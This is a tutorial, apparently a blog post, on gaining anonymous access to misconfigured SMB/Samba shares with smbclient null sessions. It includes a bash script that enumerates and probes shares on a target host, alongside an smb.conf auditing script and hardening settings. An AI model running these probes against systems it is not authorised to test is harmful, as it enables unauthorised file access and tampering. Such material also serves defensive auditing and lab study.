Exploiting Poor SMB Configuration

What is SMB?

SMB, which stands for Server Message Block, is a protocol for sharing files, printers, serial ports and communications abstractions such as named pipes and mail slots between computers.

SMB is a client-server, request-response protocol. The only exception to the request-response nature of SMB (that is, where the client makes requests and the server sends back responses), is when the client has requested opportunistic locks (oplocks) and the server, subsequently, has to break an already granted oplock because another client has requested a file open with a mode that’s incompatible with the granted oplock. In this case, the server sends an unsolicited message to the client signalling the oplock break.


Servers make file systems and other resources (printers, mailslots, named pipes, APIs) available to clients on the network. Client computers may have their own hard disks, but they also want access to the shared file systems and printers on the servers.

(Samba.org)

 

Exploiting Badly Configured SMB Shares

What you’ll need:

  1. A machine with the smbclient command (part of the Samba client tools)
  2. A vulnerable/poorly configured SMB server (remote or local)
  3. Network access to the SMB port: TCP 445 (legacy NetBIOS-session SMB also listens on TCP 139)


Steps:
Check share names

To list the share names a server offers, use the command:
smbclient -L 192.168.25.1 -N
(192.168.25.1 = IP of the vulnerable SMB server; -L lists the shares, -N sends no password, i.e. an anonymous "null session")


You’ll get something like this:

`
WARNING: The "syslog" option is deprecated
Domain=[COMPUTACAO] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]

        Sharename       Type      Comment
        ---------       ----      -------
        arquivos        Disk
        IPC$            IPC       IPC Service (Samba Server 4.3.9-Ubuntu)
Domain=[COMPUTACAO] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]

        Server               Comment
        ---------            -------
        SAMBA                Samba Server 4.3.9-Ubuntu

        Workgroup            Master
        ---------            -------
        COMPUTACAO           SAMBA
`
After doing that, you’ll need to pick a share name, for example “arquivos” or “IPC$”. I highly recommend picking one whose name does not end in “$”: the “$” suffix marks hidden shares (IPC$, ADMIN$, C$ and the like) that are normally administrative and need credentials, and IPC$ in particular exposes named pipes rather than files. A plain disk share is the one most likely to be readable, or even writable, without a password.


In this case, I’m going to pick “arquivos” as Sharename.

Finally, connect to the share, again without a password:

smbclient //192.168.25.1/arquivos -N

And that’s pretty much it. If the host really is misconfigured (the share allows guest/anonymous access), you land at the smb: \> prompt and can list and download files (get, mget) and, if the share is also writable, upload them (put, mput).

Example:
`
WARNING: The "syslog" option is deprecated
Domain=[COMPUTACAO] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]
smb: \> ls
  .                                   D        0  Tue Jul 19 09:12:48 2016
  ..                                  D        0  Fri May 22 09:25:21 2015
  html                                D        0  Fri Jul 15 03:48:38 2016
  codeigniter                         D        0  Fri Jul  3 17:00:48 2015
  serverconfig.php                    A   100402  Fri Jul 15 03:48:46 2016
  phpmyadmin                          D        0  Fri May 22 16:28:47 2015
  khy                                AR        0  Tue Jul 19 09:12:48 2016
  cgitelnet1                          D        0  Fri Jul 15 05:40:41 2016
  supp1.1                             D        0  Tue Jul  7 19:35:09 2015
  index.html                          N      142  Tue May 10 16:30:59 2016
  teste.php                           A       21  Fri May 22 11:56:35 2015
  enxjdf.exe                          N   571074  Mon Apr 14 16:06:33 2008
  cherno.php                          N   210752  Fri Jul 15 05:13:46 2016

                151380148 blocks of size 1024. 132224492 blocks available
smb: \>
`
(The second column is the DOS attribute of each entry: D = directory, A = archive, R = read-only, N = normal file.)
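The three steps above (list the shares, pick the ones whose names do not end in “$”, connect with -N) as one script. This is an added example, not code from the original post or from the Python script it links to: the listing it parses is a constructed sample modelled on the output shown earlier, 192.168.25.1 is the post’s lab address, and the network part (probe_all) only runs when a host is passed on the command line and smbclient is installed. Share names containing spaces are not handled.

```bash
#!/usr/bin/env bash
# Added example (not from the original post): script the manual steps.
# share_table/candidate_shares parse the output of `smbclient -L <host> -N`;
# probe_all tries a null session (-N) against each candidate share with
# `smbclient //host/share -N -c ls`. SAMPLE_LISTING is a constructed sample
# modelled on the post's output so the parser can be exercised offline.
set -u

SAMPLE_LISTING=$(printf '%s\n' \
  'WARNING: The "syslog" option is deprecated' \
  'Domain=[COMPUTACAO] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]' \
  '' \
  '        Sharename       Type      Comment' \
  '        ---------       ----      -------' \
  '        arquivos        Disk' \
  '        public          Disk      Drop box' \
  '        backup$         Disk      Hidden backup share' \
  '        printers        Printer   All Printers' \
  '        IPC$            IPC       IPC Service (Samba Server 4.3.9-Ubuntu)' \
  'Domain=[COMPUTACAO] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]' \
  '' \
  '        Server               Comment' \
  '        ---------            -------' \
  '        SAMBA                Samba Server 4.3.9-Ubuntu')

# share_table: read `smbclient -L` output on stdin and print "name type" for
# each row of the Sharename table. The table starts after the "Sharename Type"
# header and ends at the first line whose second field is not a share type.
share_table() {
    awk '
        /^[[:space:]]*Sharename[[:space:]]+Type/ { in_table = 1; next }
        !in_table { next }
        /^[[:space:]]*-+[[:space:]]+-+/ { next }        # dashed rule under the header
        $2 == "Disk" || $2 == "Printer" || $2 == "Device" || $2 == "IPC" { print $1, $2; next }
        { in_table = 0 }                                 # anything else ends the table
    '
}

# candidate_shares: keep Disk shares whose name does not end in "$". Names
# ending in "$" are hidden shares (IPC$, ADMIN$, C$, ...) that normally need
# credentials, and IPC$ carries named pipes rather than files.
candidate_shares() {
    awk '$2 == "Disk" && $1 !~ /\$$/ { print $1 }'
}

# probe_share: try an unauthenticated connection to //host/share and list its
# root. Returns smbclient's exit status: 0 if the server let us in, non-zero
# on NT_STATUS_ACCESS_DENIED / NT_STATUS_LOGON_FAILURE or a connect failure.
probe_share() {
    host=$1; share=$2
    smbclient "//${host}/${share}" -N -c 'ls' >/dev/null 2>&1
}

# probe_all: enumerate with -L, then test every candidate share.
# Usage: ./smb_probe.sh 192.168.25.1   (the post's lab host; assumed address)
probe_all() {
    host=$1
    smbclient -L "$host" -N 2>/dev/null | share_table | candidate_shares |
    while IFS= read -r share; do
        if probe_share "$host" "$share"; then
            printf 'OPEN    //%s/%s  (null session accepted; try get/put)\n' "$host" "$share"
        else
            printf 'DENIED  //%s/%s\n' "$host" "$share"
        fi
    done
}

if [ "$#" -ge 1 ] && command -v smbclient >/dev/null 2>&1; then
    probe_all "$1"
else
    # No target (or no smbclient): show what the parser extracts from the sample.
    printf '%s\n' "$SAMPLE_LISTING" | share_table | candidate_shares
fi
```

Run without arguments it prints the two candidate shares from the sample (arquivos and public); with a host it prints one OPEN/DENIED line per candidate, so an OPEN line is exactly the condition the post describes as "totally vulnerable".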


You can view all the smbclient commands by typing ? (or help) at the prompt:

`
smb: \> ?
?              allinfo        altname        archive        backup
blocksize      cancel         case_sensitive cd             chmod
chown          close          del            dir            du
echo           exit           get            getfacl        geteas
hardlink       help           history        iosize         lcd
link           lock           lowercase      ls             l
mask           md             mget           mkdir          more
mput           newer          notify         open           posix
posix_encrypt  posix_open     posix_mkdir    posix_rmdir    posix_unlink
print          prompt         put            pwd            q
queue          quit           readlink       rd             recurse
reget          rename         reput          rm             rmdir
showacls       setea          setmode        scopy          stat
symlink        tar            tarmode        timeout        translate
unlock         volume         vuid           wdel           logon
listconnect    showconnect    tcon           tdis           tid
logoff         ..             !
`
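The server side of the same misconfiguration. The host above is running Samba, and the settings that let an -N connection in live in smb.conf. As an added example (not code from the post), here is a shell function that audits a config for those settings, run against a constructed weak config modelled on a share like "arquivos" and a constructed hardened version of the same share. The paths and group names (@backup, @www, @webadmin) are made up.

```bash
#!/usr/bin/env bash
# Added example (not from the original post): audit an smb.conf for the
# settings that let `smbclient //host/share -N` connect. Both configs are
# constructed: WEAK_CONF is modelled on a share like "arquivos" from the post,
# HARDENED_CONF is the same share with the guest/write settings corrected.
set -u

WEAK_CONF='[global]
   workgroup = COMPUTACAO
   server string = Samba Server %v
   ; failed logins fall through to the guest account
   map to guest = Bad User

[arquivos]
   path = /var/www
   ; anonymous (-N) users may connect ...
   guest ok = yes
   ; ... and may upload files
   read only = no
   browseable = yes

[backup$]
   path = /srv/backup
   valid users = @backup
   read only = yes'

HARDENED_CONF='[global]
   workgroup = COMPUTACAO
   server string = Samba Server %v
   ; bad credentials are rejected instead of being mapped to guest
   map to guest = Never

[arquivos]
   path = /var/www
   guest ok = no
   valid users = @www
   read only = yes
   ; only this group may write
   write list = @webadmin
   browseable = yes'

# audit_conf: read smb.conf on stdin and print one line per share,
#   <share> guest=<yes|no> writable=<yes|no> <verdict>
# followed by a warning line if "map to guest" is anything but Never.
# Samba defaults are "guest ok = no" and "read only = yes"; "public" is a
# synonym for "guest ok", "writable"/"writeable" the inverse of "read only".
audit_conf() {
    awk '
        function norm(s)   { gsub(/^[ \t]+|[ \t]+$/, "", s); return tolower(s) }
        function asbool(v) { return (v == "yes" || v == "true" || v == "1") ? "yes" : "no" }
        function flush() {
            if (section == "" || section == "global") return
            verdict = (guest == "yes") ? ((writable == "yes") ? "ANON-WRITE" : "ANON-READ") : "ok"
            printf "%s guest=%s writable=%s %s\n", section, guest, writable, verdict
        }
        /^[ \t]*[#;]/ { next }                           # comment lines
        /^[ \t]*\[/ {                                    # [section] header
            flush()
            section = $0; sub(/^[ \t]*\[/, "", section); sub(/\].*$/, "", section)
            guest = "no"; writable = "no"
            next
        }
        /=/ {
            eq = index($0, "="); key = norm(substr($0, 1, eq - 1)); val = norm(substr($0, eq + 1))
            if (section == "global" && key == "map to guest" && val != "never") map_to_guest = val
            if (key == "guest ok" || key == "public")    guest    = asbool(val)
            if (key == "read only")                      writable = (asbool(val) == "yes") ? "no" : "yes"
            if (key == "writable" || key == "writeable") writable = asbool(val)
        }
        END {
            flush()
            if (map_to_guest != "") printf "global map_to_guest=%s (failed logins become guest)\n", map_to_guest
        }
    '
}

printf '== weak smb.conf ==\n';     printf '%s\n' "$WEAK_CONF"     | audit_conf
printf '== hardened smb.conf ==\n'; printf '%s\n' "$HARDENED_CONF" | audit_conf
```

For the weak config the audit flags arquivos as ANON-WRITE and warns about "map to guest = Bad User" (the setting that turns a null session into guest access); the hidden backup$ share is reported ok because it is read-only and not guest-accessible. The hardened config produces a single ok line for arquivos and no warning. To check a live host instead of the sample, run `testparm -s /etc/samba/smb.conf | audit_conf` on the server.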


A Python script that does all the hard work; if you want, you can get it here.

By: Kl4us

Full article@
